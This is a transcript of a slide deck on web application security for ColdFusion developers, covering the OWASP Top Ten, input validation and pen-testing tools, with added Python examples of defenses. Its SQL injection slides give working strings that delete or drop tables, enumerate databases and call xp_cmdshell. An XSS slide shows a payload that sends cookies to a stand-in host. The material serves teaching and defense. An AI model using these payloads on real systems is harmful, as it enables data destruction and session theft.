Web Application Security: Practicing Defense In-Depth - PowerPoint PPT Presentation

About This Presentation
Title:

Web Application Security: Practicing Defense In-Depth

Description:

Write a UDF to escape special characters in content that may be used for XSS ... the user by logging server-side and providing a unique ID to reference the error ... – PowerPoint PPT presentation

Number of Views:178
Avg rating:3.0/5.0
Slides: 45
Provided by: tri5595

Transcript and Presenter's Notes

1
Web Application Security Practicing Defense
In-Depth
  • Dean H. Saxe
  • dean_at_fullfrontalnerdity.com

2
Tonight's Presentation
  • What will be covered
  • OWASP Top Ten
  • Defense In Depth - The Onion Model
  • Penetration testing
  • Web App Firewalls
  • Web Application Vulnerability Scanners
  • Tools
  • Resources

3
Security Misconceptions
  • The Firewall protects my web server and database
  • Access to the server through ports 80 and 443
    makes the web server part of your external
    perimeter defenses
  • Vulnerabilities in the web server software or web
    applications may allow access to internal network
    resources

4
Security Misconceptions
  • The IDS protects my web server and database
  • The IDS is configured to detect signatures of
    various well-known attacks
  • Attack signatures do not include those for
    attacks against custom applications

5
Security Misconceptions
  • SSL secures my site
  • SSL secures the transport of data between the web
    server and the user's browser
  • SSL does not protect against attacks against the
    server and applications
  • SSL is the hacker's best friend due to the false
    sense of security

6
Open Web Application Security Project
  • http://www.owasp.org
  • OWASP Top Ten Vulnerabilities
  • OWASP Guide
  • OWASP Testing Guide
  • WebGoat
  • And much more to come

7
Web Applications First Line of Defense?
  • Requests can be sent from around the world
  • Jon Postel on TCP/IP: "Be liberal in what you accept
    and conservative in what you send"
  • Not all HTTP requests are valid but are often
    accepted by the web server
  • Many webapps are liberal in what they accept
    (poor validation) resulting in undesirable
    behaviors

8
SQL Injection I
  • SQL Injection is a command injection attack
    caused by unvalidated input and string-building
    to craft DB queries
  • Attacker sends specially crafted data to the
    application in order to modify the queries being
    sent to the DB

9
SQL Injection II
  • SELECT *
  • FROM accounts
  • WHERE acct_id = #URL.acct_id#

10
SQL Injection III
  • GET /view_account.cfm?acct_id=28 HTTP/1.1
  • SELECT *
  • FROM accounts
  • WHERE acct_id = 28

11
SQL Injection IV
  • GET /view_account.cfm?acct_id=28 OR 1=1 HTTP/1.1
  • SELECT *
  • FROM accounts
  • WHERE acct_id = 28 OR 1=1

12
SQL Injection V
  • SELECT *
  • FROM users
  • WHERE username = '#URL.lastname#'

13
SQL Injection VI
  • GET /user_lookup.cfm?lastname=O'Malley HTTP/1.1
  • SELECT *
  • FROM users
  • WHERE lastname = 'O''Malley'

14
SQL Injection VII
  • <cfset URL.lastname = "'#URL.lastname#'">
  • SELECT *
  • FROM users
  • WHERE username = #preserveSingleQuotes(URL.lastname)#
  • GET /user_lookup.cfm?lastname=O'Malley HTTP/1.1
  • SELECT *
  • FROM users
  • WHERE lastname = 'O'Malley'

15
SQL Injection VIII
  • GET /user_lookup.cfm?lastname=foo'; DELETE FROM
    users WHERE 1=1 HTTP/1.1
  • SELECT *
  • FROM users
  • WHERE lastname = 'foo'; DELETE FROM users WHERE
    1=1

16
SQL Injection IX
  • CF 5 bug prevents escaping of single quotes in
    queries when the variable being evaluated uses
    array syntax.
  • SELECT *
  • FROM users
  • WHERE username = '#URL["lastname"]#'
  • GET /user_lookup.cfm?lastname=O'Malley HTTP/1.1
  • SELECT *
  • FROM users
  • WHERE lastname = 'O'Malley'

17
SQL Injection Useful Injection Strings
  • acct_id=28 OR 1=1
  • Try various OR clauses using <>, >, <, LIKE,
    etc.
  • Use comments to end a statement prematurely
  • SELECT * FROM users WHERE user_id = 1-- AND
    password='mypass'
  • Enumerate database information
  • acct_id=28 UNION SELECT name, 1, 2 FROM
    sysobjects WHERE xtype='U'
  • acct_id=28 UNION SELECT column_names FROM table
  • UNION requires both statements to share a common
    number of columns; add columns as required

18
SQL Injection SQL Server
  • Concatenate multiple statements with semicolons
  • acct_id=28; DROP TABLE Users
  • Useful Stored Procedures
  • xp_msver
  • xp_cmdshell command
  • xp_servicecontrol action service

19
SQL Injection Oracle
  • Multiple statements not allowed
  • Enumerate database
  • acct_id=28 UNION SELECT username FROM all_users
  • acct_id=28 UNION SELECT object_type, owner FROM
    all_objects
  • Abuse ALL_*, USER_*, V$ views

20
SQL Injection Mitigation Techniques
  • Principle of Least Privileges
  • Database should run with lowest possible system
    privileges
  • Database users should be allowed the least
    possible privileges. Disable privileges to
    stored procedures, tables, etc when not required.
  • Limit execution privileges for users to SELECT,
    UPDATE, DELETE and user stored procedures
  • Don't use sa!

21
SQL Injection Prevention
  • Parameterized queries
  • <cfqueryparam>
  • <cfstoredprocparam>
  • Can't be used with the cachedwithin, cacheduntil
    attributes of <cfquery>
  • Data validation
  • Stored procedures
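
The string-building and parameterized versions of the account and user lookups side by side, as an added example that is not from the presentation; it uses Python and sqlite3 rather than ColdFusion, and the tables and their rows are constructed for the example:

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the slides' accounts and users tables.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (acct_id INTEGER, acct_name TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [(28, "alice"), (29, "bob"), (30, "carol")])
    conn.execute("CREATE TABLE users (lastname TEXT)")
    conn.executemany("INSERT INTO users VALUES (?)", [("O'Malley",), ("Smith",)])
    return conn

def view_account_unsafe(conn, acct_id):
    # String-building, the slides' WHERE acct_id = #URL.acct_id# pattern:
    # whatever arrives in the query string is parsed as part of the SQL.
    sql = f"SELECT acct_id FROM accounts WHERE acct_id = {acct_id}"
    return [row[0] for row in conn.execute(sql)]

def view_account_safe(conn, acct_id):
    # Validate the type first (an account id is digits only), then bind the
    # value as a parameter so it can never change the shape of the statement.
    if not acct_id.isdigit():
        raise ValueError("acct_id must be an integer")
    sql = "SELECT acct_id FROM accounts WHERE acct_id = ?"
    return [row[0] for row in conn.execute(sql, (int(acct_id),))]

def lookup_user_unsafe(conn, lastname):
    # Quoted string-building, the preserveSingleQuotes() case on the slides:
    # the legitimate name O'Malley already breaks the query, so a crafted
    # quote can rewrite it just as easily.
    sql = f"SELECT lastname FROM users WHERE lastname = '{lastname}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_user_safe(conn, lastname):
    # Bound parameter: the driver handles quoting, so O'Malley simply matches.
    sql = "SELECT lastname FROM users WHERE lastname = ?"
    return [row[0] for row in conn.execute(sql, (lastname,))]
```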

22
Cross Site Scripting (XSS)
  • Attacker injects client-side scripts (JavaScript)
    into the browser
  • Code is executed by the browser to perform some
    action
  • Major XSS methods
  • Social Engineering: entice the user to click on a
    link with a malicious payload
  • Stored data invokes JavaScript when the user
    views a page (e.g. user forums)

23
XSS Examples
  • <script>location.href='http://10.1.1.1/steal.cfm?c='+document.cookie</script>
  • <a href="javas&#99;ript:&#35;code">
  • <div style="behaviour: url(link to code)">
  • <body onload="code">
  • <img src="javascript:code">
  • Attempt hex and double-Unicode encoding to
    subvert blacklists
  • And many, many more.

24
Cross Site Scripting Prevention
  • Input validation
  • Output filtering
  • htmlEditFormat()
  • Replaces <, >, ", & with their entity values
  • extendedHtmlEditFormat()
  • Write a UDF to escape special characters in
    content that may be used for XSS
  • Replace <, >, ", ', (, ), & with their entity
    values
  • Wrap all output with potentially dangerous
    characters in the UDF
  • Ability to quickly add new characters if new
    attacks are discovered
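
An added example of the extended escaping UDF this slide asks for, written in Python rather than CFML and not part of the original deck. The character sets, function names and the small profile page are assumptions for the example, and the URL scheme check goes one step beyond the slide, since escaping alone cannot neutralise a javascript: URL placed in href:

```python
import re

# Constructed character sets: the narrow set the slides say htmlEditFormat()
# handles, and the extended set for the UDF they recommend writing.
HTMLEDITFORMAT_CHARS = {"<", ">", '"', "&"}
EXTENDED_CHARS = HTMLEDITFORMAT_CHARS | {"'", "(", ")"}

def escape_output(value, unsafe=EXTENDED_CHARS):
    # Replace each listed character with its numeric entity; numeric entities
    # are valid in text nodes and quoted attributes alike. Adding a character
    # later is a one-token change to the set.
    return "".join(f"&#{ord(c)};" if c in unsafe else c for c in value)

def escape_whitelist(value):
    # Whitelist variant: only letters, digits, space and a few punctuation
    # marks pass through untouched; everything else is entity-encoded.
    return "".join(c if re.fullmatch(r"[A-Za-z0-9 .,_-]", c) else f"&#{ord(c)};"
                   for c in value)

def safe_link_target(url):
    # Escaping cannot make a javascript: URL harmless inside href, so URL
    # attributes also need a scheme whitelist (input validation, not filtering).
    return url if re.match(r"^https?://", url) else "#"

def render_profile(display_name, homepage):
    # "Wrap all output": every dynamic value passes through the UDF, whether
    # it lands in a text node or in an attribute value.
    return (f"<p>Welcome, {escape_output(display_name)}</p>"
            f'<a href="{escape_output(safe_link_target(homepage))}">home</a>')

# The slides' cookie-stealing payload, used here only as test input.
COOKIE_STEALER = ("<script>location.href='http://10.1.1.1/steal.cfm?c='"
                  "+document.cookie</script>")
```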

25
Parameter Tampering
  • Modifying pre-set variables in order to subvert
    application logic
  • Change a list of states to include the option
    value
  • GA'; DELETE FROM users WHERE 1=1
  • Modification of cookies, query strings, hidden
    fields, select boxes, check boxes, radio buttons
    and other fixed data
  • Change cookie value admin=n -> admin=y to elevate
    privileges
  • Index.cfm?mode=debug can be used to elicit the
    debug mode of ColdFusion, potentially revealing
    template and database info.
  • <cfsetting showdebugoutput="false"> in
    Application.cfm will prevent debug information
    from ever being shown.
  • Limiting debug output to 127.0.0.1 on production
    servers can also be used

26
Parameter Tampering Prevention
  • Data validation
  • Must be server-side, client-side validation with
    JavaScript can be subverted easily
  • Ensures data is within specified character set,
    length, etc.
  • Validate multiple pieces of information which are
    interdependent
  • Validate all data from the browser (CGI.,
    COOKIE., FORM., URL.) for content, extra
    fields, missing fields, duplicated fields
  • All validation must be complete before any
    further processing of the request. Consider
    moving validated data to a new scope
    (VALIDATED.FORM.field_name) for easy code reviews

27
Whitelist vs. Blacklist
  • What's a blacklist?
  • Blacklists are used for a negative assertion: the
    data being analyzed is not in the blacklist
  • What's a whitelist?
  • Whitelists are used for a positive assertion: the
    data being analyzed matches an item in the
    whitelist
  • Which is better and why?

28
Whitelist Is a Better Approach
  • Searching for valid data is easier than searching
    for invalid data
  • Attackers represent data in many different manners

29
Building a Better Validation Engine
  • Identify general data types and valid content for
    each
  • Alphabetic
  • Alphanumeric
  • Special characters
  • Numeric
  • Integer
  • Floating point
  • Comma or period delimited? Negative numbers?
  • HTML content
  • Limit accepted tags and attributes with
    whitelists for acceptable content

30
Building a Better Validation Engine II
  • Validate all data received from the users
    browser
  • Hidden form fields, check boxes, select boxes all
    require validation!
  • Use indirection rather than primary keys
  • Present user with a select box with option values
    of 1..N, referencing the ordinal position of the
    item in an array in the users state
  • Validate value is within the bounds of the array

31
Building a Better Validation Engine Indirection
  • <select name="acct_id">
  • <cfoutput query="list_accounts">
  • <option value="#acct_id#">#acct_name#
    #acct_number#</option>
  • </cfoutput>
  • </select>
  • <cfset VARIABLES.acct_id_array = arrayNew(1)>
  • <select name="acct_id">
  • <cfoutput query="list_accounts">
  • <cfset arrayAppend(VARIABLES.acct_id_array,
    acct_id)>
  • <option
  • value="#arrayLen(VARIABLES.acct_id_array)#">
  • #acct_name# #acct_number#
  • </option>
  • </cfoutput>
  • </select>

32
Building a Better Validation Engine VI
  • Requirements for a better engine
  • Register form fields with their validation
    routines when creating views
  • Automatic indirection
  • Automatic server-side validation cannot be
    subverted by developer
  • Easy to scan for proper use of validation engine
  • Built-in validators for common data types
  • Additional client-side validation, too!
  • Where is this mythical product for CF?
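
One way to build the engine slides 26 through 32 describe, with registered validators, checks for missing, extra and duplicated fields, and indirection for select boxes in one place. This is an added Python example, not the CF product the slide asks for; the Form class, the validators and the account keys are constructed for it:

```python
import re

# Constructed whitelist validators for the data types the slides list.
VALIDATORS = {
    "alpha":   lambda v: re.fullmatch(r"[A-Za-z]+", v) is not None,
    "alnum":   lambda v: re.fullmatch(r"[A-Za-z0-9]+", v) is not None,
    "integer": lambda v: re.fullmatch(r"-?[0-9]+", v) is not None,
}

class ValidationError(Exception):
    pass

class Form:
    # Fields are registered with their validators when the view is built,
    # so the receiving side cannot forget to validate one.
    def __init__(self):
        self.fields = {}    # name -> (validator, max_len)
        self.choices = {}   # name -> real keys behind an indirected select

    def field(self, name, kind, max_len):
        self.fields[name] = (VALIDATORS[kind], max_len)

    def select(self, name, real_keys):
        # Indirection: the browser only ever sees option values 1..N; the
        # primary keys stay in server-side state.
        self.choices[name] = list(real_keys)
        return list(range(1, len(real_keys) + 1))

    def validate(self, raw):
        # raw is a list of (name, value) pairs straight from the request so
        # duplicated fields are still visible at this point.
        names = [n for n, _ in raw]
        if set(names) != set(self.fields) | set(self.choices):
            raise ValidationError("missing or extra field")
        if len(names) != len(set(names)):
            raise ValidationError("duplicated field")
        validated = {}                      # the VALIDATED scope of the slides
        for name, value in raw:
            if name in self.choices:
                keys = self.choices[name]
                if not value.isdigit() or not 1 <= int(value) <= len(keys):
                    raise ValidationError(f"{name}: not a valid option")
                validated[name] = keys[int(value) - 1]
            else:
                check, max_len = self.fields[name]
                if len(value) > max_len or not check(value):
                    raise ValidationError(f"{name}: bad content")
                validated[name] = value
        return validated
```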

33
Error Handling
  • Application Errors
  • Errors are an attacker's best friend since they
    often reveal sensitive information
  • Hide the error from the user by logging
    server-side and providing a unique ID to
    reference the error
  • Data validation errors
  • Bad Input
  • Malicious Input

34
Encryption and Hashing
  • Encryption is used to hide data
  • Hashing is used to verify integrity of data
  • Both are generally used improperly leading to a
    false sense of security
  • Practical Cryptography by Niels Ferguson and
    Bruce Schneier

35
Web and Applications Server Misconfiguration
  • Backup files left accessible in the web root
  • Admin directories and applications exposed to the
    outside world
  • CFAdministrator
  • IIS Control Panel

36
Broken Access Controls
  • Forced Browsing
  • Malicious user can manually browse to any page on
    the server, potentially escaping access control
  • Use an architecture that allows the user to be
    tracked through the application with positive
    assertion that he has access to the page being
    requested and it is not out of sequence for the
    current process

37
Grab Bag
  • Secure cookies
  • Comments
  • Parameter Tampering via Cookie Poisoning
  • Add HMAC to cookie to prevent tampering
  • Hash(salt + value) -> HMAC
  • Modifying hidden fields
  • Store in state data
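
The cookie-tampering countermeasure from this slide as an added Python example, not from the presentation. It uses a keyed HMAC-SHA256 from the standard library in place of the slide's Hash(salt + value) so that the client cannot recompute the tag, and the server key and the admin flag format are assumptions:

```python
import base64
import hashlib
import hmac

# Assumption: in a real deployment the key comes from server-side config,
# never from source. This constructed value exists only for the example.
SERVER_KEY = b"example-only-server-key-replace-me"

def sign_cookie(value, key=SERVER_KEY):
    # Cookie becomes "<value>.<mac>" with mac = HMAC-SHA256(key, value).
    # A keyed MAC rather than a bare hash of salt+value: without the key the
    # client cannot produce a valid tag for an altered value.
    mac = hmac.new(key, value.encode(), hashlib.sha256).digest()
    return value + "." + base64.urlsafe_b64encode(mac).decode().rstrip("=")

def verify_cookie(cookie, key=SERVER_KEY):
    # Returns the trusted value, or None if the cookie was altered or forged.
    value, sep, _mac = cookie.rpartition(".")
    if not sep:
        return None
    expected = sign_cookie(value, key)
    # Constant-time comparison: a plain == would leak, through response
    # timing, how many leading MAC characters a guess got right.
    return value if hmac.compare_digest(expected, cookie) else None

def is_admin(cookie):
    # The slides' admin=n -> admin=y case: the flag is read only from a
    # cookie whose MAC verified.
    return verify_cookie(cookie) == "admin=y"
```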

38
Penetration Testing Your Apps
  • Man In The Middle Proxies
  • Used to trap HTTP request/response stream and
    modify data on the fly
  • Achilles
  • Paros
  • WebScarab

39
Penetration Testing Your Apps II
  • Testing Server Hardening
  • Nikto - scan for well known vulnerabilities on
    web servers
  • Nmap - Port scanner to scan the network for open
    ports
  • Netcat - Network Swiss Army knife. Useful for
    connecting to web servers or other open ports for
    banner grabbing and reconnaissance. Can be used for
    shell shovelling
  • OpenSSL - Open source SSL toolkit. Used to
    create an SSL proxy for netcat to explore secure
    web servers

40
Penetration Testing Your Apps III
  • Web Application Vulnerability Scanners
  • Automatically walk your application, scanning for
    XSS, SQL Injection, server-level vulnerabilities
  • WebInspect
  • ScanDo
  • AppScan
  • 6-20% hit rate
  • Outsource the work
  • There is no body in charge of certifying the
    quality of the work done by various PenTest
    companies. Buyer beware!
  • ISS
  • FoundStone
  • Etc.

41
Securing Your Apps
  • Very large body of existing code needs
    remediation
  • Identify priorities
  • What can be done quickly?
  • Configuration of servers
  • Global error handling
  • Assess value of assets to be protected
  • Protect high value assets first

42
Securing Your Apps II
  • Web Application Firewalls
  • Vendors claim quick deployment to protect apps
  • Reality is not so quick, depending on size and
    complexity of app
  • Brings business logic into another application
    layer
  • Requires identifying params passed to each page,
    writing of appropriate RegEx
  • Misses parameter tampering if data matches regex

43
Resources
  • OWASP
  • SecurityFocus
  • SPIDynamics
  • FoundStone
  • www.hackingexposed.com
  • Innocent Code by Sverre H. Huseby
  • Training Courses
  • Foundstone
  • Intense Training

44
Comments/Questions?
  • Dean H. Saxe
  • dean_at_fullfrontalnerdity.com